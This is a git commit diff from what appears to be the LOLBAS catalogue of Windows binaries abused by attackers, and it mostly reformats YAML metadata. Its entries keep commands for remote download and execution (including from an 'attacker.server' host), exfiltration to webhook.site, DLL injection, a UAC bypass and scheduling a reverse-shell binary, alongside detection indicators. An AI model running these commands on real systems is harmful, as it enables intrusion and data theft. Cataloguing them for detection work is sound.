Merge branch 'master' into master

This commit is contained in:
Oddvar Moe 2021-10-22 16:46:18 +02:00 committed by GitHub
commit 1b15eccf07
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
161 changed files with 1208 additions and 944 deletions

12
.github/workflows/yamllinting.yml vendored Normal file
View File

@ -0,0 +1,12 @@
---
name: Yaml Lint
on: [push, pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
config_file: .yamllint

15
.yamllint Normal file
View File

@ -0,0 +1,15 @@
---
extends: default
yaml-files:
- '*.yml'
rules:
new-line-at-end-of-file:
level: warning
trailing-spaces:
level: warning
line-length:
level: warning
new-lines:
level: warning
indentation:
level: warning

View File

@ -34,7 +34,6 @@ Resources:
- Link: Threatintelreport...
Acknowledgement:
- Person: John Doe
Handle: @johndoe
Handle: '@johndoe'
- Person: Ola Norman
Handle: @olaNor
---
Handle: '@olaNor'

View File

@ -14,5 +14,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/bohops/status/986984122563391488
Notes: Thanks to Jimmy - @bohops
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -22,5 +22,6 @@ Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
- https://attack.mitre.org/wiki/Technique/T1128
- https://twitter.com/teemuluotio/status/990532938952527873
Notes: ''
Acknowledgement:
- Person: ''
- Handle: ''

View File

@ -2,8 +2,7 @@
Name: Nltest.exe
Description: Credentials
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
Description: ''
@ -14,4 +13,6 @@ Detection: []
Resources:
- https://twitter.com/sysopfb/status/986799053668139009
- https://ss64.com/nt/nltest.html
Notes: Thanks to Sysopfb - @sysopfb
Acknowledgement:
- Person: Sysopfb
Handle: '@sysopfb'

View File

@ -3,7 +3,6 @@ Name: Openwith.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: OpenWith.exe /c C:\test.hta
Description: Opens the target file with the default application.
@ -16,5 +15,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/harr0ey/status/991670870384021504
Notes: Thanks to Matt harr0ey - @harr0ey
Acknowledgement:
- Person: Matt harr0ey
Handle: '@harr0ey'

View File

@ -3,7 +3,6 @@ Name: Powershell.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: powershell -ep bypass - < c:\temp:ttt
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
@ -14,5 +13,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
Notes: Thanks to Moriarty - @Moriarty_Meng
Acknowledgement:
- Person: Moriarty
Handle: '@Moriarty_Meng'

View File

@ -18,5 +18,6 @@ Code_Sample: []
Detection: []
Resources:
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Notes: 'Thanks to '
Acknowledgement:
- Person: ''
- Handle: ''

View File

@ -2,7 +2,7 @@
Name: Robocopy.exe
Description: Copy
Author: ''
Created: '2018-05-25'
Created: 2018-05-25
Categories: []
Commands:
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
@ -16,5 +16,6 @@ Code_Sample: []
Detection: []
Resources:
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
Notes: Thanks to Name of guy - @twitterhandle
Acknowledgement:
- Person: ''
- Handle: ''

View File

@ -2,8 +2,7 @@
Name: AcroRd32.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/997997818362155008
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Gpup.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Description: Execute another command through gpup.exe (Notepad++ binary).
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/997892519827558400
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nlnotes.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon
Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Notes.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
Resources:
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
- https://twitter.com/HanseSecure/status/995578436059127808
Notes: Thanks to Daniel Bohannon - @danielhbohannon
Acknowledgement:
- Person: Daniel Bohannon
Handle: '@danielhbohannon'

View File

@ -2,8 +2,7 @@
Name: Nvudisp.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Nvudisp.exe System calc.exe
Description: Execute calc.exe as a subprocess.
@ -23,4 +22,7 @@ Code_Sample: []
Detection: []
Resources:
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: Nvuhda6.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: nvuhda6.exe System calc.exe
Description: Execute calc.exe as a subprocess.
@ -23,4 +22,6 @@ Code_Sample: []
Detection: []
Resources:
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
Notes: Thanks to Adam - @hexacorn
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'

View File

@ -2,8 +2,7 @@
Name: ROCCAT_Swarm.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/994213164484001793
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -23,5 +23,5 @@ Resources:
- Link: https://twitter.com/bartblaze/status/1107390776147881984
Acknowledgement:
- Person: Bart
Handle: @bartblaze
Handle: '@bartblaze'
---

View File

@ -2,8 +2,7 @@
Name: Setup.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Run Setup.exe
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/994381620588236800
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -3,6 +3,7 @@ Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
Author: 'Jesus Galvez'
Created: '2020-11-01'
Commands:
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
@ -14,5 +15,5 @@ Created: '2020-11-01'
Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---

View File

@ -2,8 +2,7 @@
Name: Usbinst.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993514357807108096
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -2,8 +2,7 @@
Name: VBoxDrvInst.exe
Description: Persistence
Author: ''
Created: '2018-05-25'
Categories: []
Created: 2018-05-25
Commands:
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
@ -13,4 +12,6 @@ Code_Sample: []
Detection: []
Resources:
- https://twitter.com/pabraeken/status/993497996179492864
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'

View File

@ -1,20 +1,20 @@
Name: aswrundll.exe
Description: This process is used by AVAST antivirus to run and execute any modules
Author: Eli Salem
Created: 19\03\2019
Created: '2019-03-19'
Commands:
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
Description: Load and execute modules using aswrundll
Usecase: Execute malicious modules using aswrundll.exe
Category: Execute
Privileges: Any
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Program Files\Avast Software\Avast\aswrundll
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
Code_Sample:
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
Resources:
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
Acknowledgement:
- Person: Eli Salem
handle: https://www.linkedin.com/in/eli-salem-954728150
handle: 'https://www.linkedin.com/in/eli-salem-954728150'

View File

@ -2,7 +2,7 @@
Name: winword.exe
Description: Document editor included with Microsoft Office.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: winword.exe /l dllfile.dll
Description: Launch DLL payload.
@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

View File

@ -2,18 +2,18 @@
Name: testxlst.js
Description: Script included with Pywin32.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution
Category: Execution
Privileges: User
MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
OperatingSystem: Windows
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
Categories: Execution
Category: Execution
Privileges: User
MitreID: T1064
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
@ -25,4 +25,6 @@ Detection: []
Resources:
- https://twitter.com/bohops/status/993314069116485632
- https://github.com/mhammond/pywin32
Notes: Thanks to Jimmy - @bohops
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'

View File

@ -2,7 +2,7 @@
Name: At.exe
Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith'
Created: '2019-09-20'
Created: 2019-09-20
Commands:
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Description: Create a recurring task to execute every day at a specific time.

View File

@ -2,7 +2,7 @@
Name: Atbroker.exe
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).

View File

@ -2,7 +2,7 @@
Name: Bash.exe
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe

View File

@ -2,7 +2,7 @@
Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.

28
yml/OSBinaries/Certoc.yml Normal file
View File

@ -0,0 +1,28 @@
---
Name: CertOC.exe
Description: Used for installing certificates
Author: 'Ensar Samil'
Created: '2021-10-07'
Commands:
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
Description: Loads the target DLL file
Usecase: Execute code within DLL file
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows Server 2022
Full_Path:
- Path: c:\windows\system32\certoc.exe
- Path: c:\windows\syswow64\certoc.exe
Code_Sample:
- Code:
Detection:
- IOC: Process creation with given parameter
- IOC: Unsigned DLL load via certoc.exe
Resources:
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
Acknowledgement:
- Person: Ensar Samil
Handle: '@sblmsrsn'
---

View File

@ -2,7 +2,7 @@
Name: CertReq.exe
Description: Used for requesting and managing certificates
Author: 'David Middlehurst'
Created: '2020-07-07'
Created: 2020-07-07
Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory

View File

@ -2,7 +2,7 @@
Name: Certutil.exe
Description: Windows binary used for handling certificates
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.

View File

@ -2,7 +2,7 @@
Name: Cmd.exe
Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut'
Created: '2019-06-26'
Created: 2019-06-26
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Description: Add content to an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cmdkey /list
Description: List cached credentials

26
yml/OSBinaries/Cmdl32.yml Normal file
View File

@ -0,0 +1,26 @@
---
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: 'Elliot Killick'
Created: '2021-08-26'
Commands:
- Command: cmdl32 /vpn /lan %cd%\config
Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\cmdl32.exe
- Path: C:\Windows\SysWOW64\cmdl32.exe
Detection:
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
Resources:
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -2,7 +2,7 @@
Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

View File

@ -2,7 +2,7 @@
Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: 'Ialle Teixeira'
Created: '04/09/2020'
Created: 2020-09-04
Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general

View File

@ -2,7 +2,7 @@
Name: Control.exe
Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Csc.exe
Description: Binary file used by .NET to compile C# code
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: csc.exe -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.

View File

@ -2,7 +2,7 @@
Name: Cscript.exe
Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).

View File

@ -2,7 +2,7 @@
Name: Desktopimgdownldr.exe
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Created: 28/06/2020
Created: 2020-06-28
Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen

View File

@ -2,7 +2,7 @@
Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url

View File

@ -2,7 +2,7 @@
Name: Diantz.exe
Description: Binary that package existing files into a cabinet (.cab) file
Author: 'Tamir Yehuda'
Created: '08/08/2020'
Created: 2020-08-08
Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.

View File

@ -2,7 +2,7 @@
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.

View File

@ -2,7 +2,7 @@
Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file.

View File

@ -2,7 +2,7 @@
Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window.
Author: 'Jacob Gajek'
Created: '2018-11-01'
Created: 2018-11-01
Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
@ -15,7 +15,7 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe
Code Sample:
Code_Sample:
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Detection:
- IOC: eventvwr.exe launching child process other than mmc.exe

View File

@ -2,7 +2,7 @@
Name: Expand.exe
Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: Copies source file to destination.

View File

@ -2,7 +2,7 @@
Name: Explorer.exe
Description: Binary used for managing files and system components within Windows
Author: 'Jai Minton'
Created: '2020-06-24'
Created: 2020-06-24
Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe

View File

@ -2,7 +2,7 @@
Name: Extexport.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Extexport.exe c:\test foo bar
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll

View File

@ -2,7 +2,7 @@
Name: Extrac32.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Findstr.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

View File

@ -2,7 +2,7 @@
Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.

View File

@ -2,7 +2,7 @@
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe'
Created: '2018-12-10'
Created: 2018-12-10
Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file.

View File

@ -2,7 +2,7 @@
Name: GfxDownloadWrapper.exe
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Created: Jesus Galvez
Created: 2019-12-27
Commands:
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".

View File

@ -2,7 +2,7 @@
Name: Gpscript.exe
Description: Used by group policy to process scripts
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Gpscript /logon
Description: Executes logon scripts configured in Group Policy.

View File

@ -2,7 +2,7 @@
Name: Hh.exe
Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help.

View File

@ -2,7 +2,7 @@
Name: Ie4uinit.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: ie4uinit.exe -BaseSettings
Description: Executes commands from a specially prepared ie4uinit.inf file.

View File

@ -2,7 +2,7 @@
Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.

View File

@ -2,7 +2,7 @@
Name: Ilasm.exe
Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Created: 17/03/2020
Created: 2020-03-17
Commands:
- Command: ilasm.exe C:\public\test.txt /exe
Description: Binary file used by .NET to compile c# code to .exe

View File

@ -2,7 +2,7 @@
Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

View File

@ -2,7 +2,7 @@
Name: Installutil.exe
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.

View File

@ -2,7 +2,7 @@
Name: Jsc.exe
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
Author: 'Oddvar Moe'
Created: '2019-05-31'
Created: 2019-05-31
Commands:
- Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.

View File

@ -2,7 +2,7 @@
Name: Makecab.exe
Description: Binary to package existing files into a cabinet (.cab) file
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

View File

@ -2,7 +2,7 @@
Name: Mavinject.exe
Description: Used by App-v in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110.

View File

@ -2,7 +2,7 @@
Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: 'Conor Richard'
Created: '2018-10-22'
Created: 2018-10-22
Commands:
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.

View File

@ -2,7 +2,7 @@
Name: Mmc.exe
Description: Load snap-ins to locally and remotely manage Windows systems
Author: '@bohops'
Created: '2018-12-04'
Created: 2018-12-04
Commands:
- Command: mmc.exe -Embedding c:\path\to\test.msc
Description: Launch a 'backgrounded' MMC process and invoke a COM payload

View File

@ -2,7 +2,7 @@
Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe'
Created: '09/03/2020'
Created: 2020-03-20
Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)

View File

@ -2,7 +2,7 @@
Name: Msbuild.exe
Description: Used to compile and execute code
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.

View File

@ -2,7 +2,7 @@
Name: Msconfig.exe
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
